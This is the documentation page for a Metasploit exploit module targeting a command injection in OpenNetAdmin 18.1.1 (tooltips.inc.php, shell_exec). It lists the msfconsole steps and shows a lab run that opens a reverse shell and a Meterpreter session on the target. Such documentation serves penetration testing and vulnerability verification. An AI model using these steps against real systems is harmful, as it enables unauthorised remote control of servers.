metasploit-gs/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md

Description

OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. This module exploits a command injection in OpenNetAdmin. The vulnerability exists on the tooltips.inc.php component, due to the insecure usage of the shell_exec() PHP function.

Vulnerable Application

This module has been tested with OpenNetAdmin 18.1.1

Setup

https://github.com/opennetadmin/ona/wiki/Install

Verification

Launch metasploit and set the appropriate options:

• Start msfconsole
• use exploit/unix/webapp/opennetadmin_ping_cmd_injection
• set RHOSTS <rhosts>
• set LHOST <lhost>
• set VHOST <hostname>
• exploit

Options

VHOST

The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional.

Scenarios

Tested OpenNetAdmin 18.1.1 on Ubuntu 19.10 x64

msf5 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection
msf5 exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152
RHOSTS => 172.16.172.152
msf5 exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com
VHOST => example.com
msf5 exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1
LHOST => 172.16.172.1
msf5 exploit(opennetadmin_ping_cmd_injection) > exploit
[*] Started reverse TCP handler on 172.16.172.1:4444
[*] Exploiting...
[*] Sending stage (3021284 bytes) to 172.16.172.152
[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.152:38590) at 2019-12-10 02:38:52 +0300
[*] Sending stage (3021284 bytes) to 172.16.172.152
[*] Command Stager progress - 100.12% done (810/809 bytes)

meterpreter >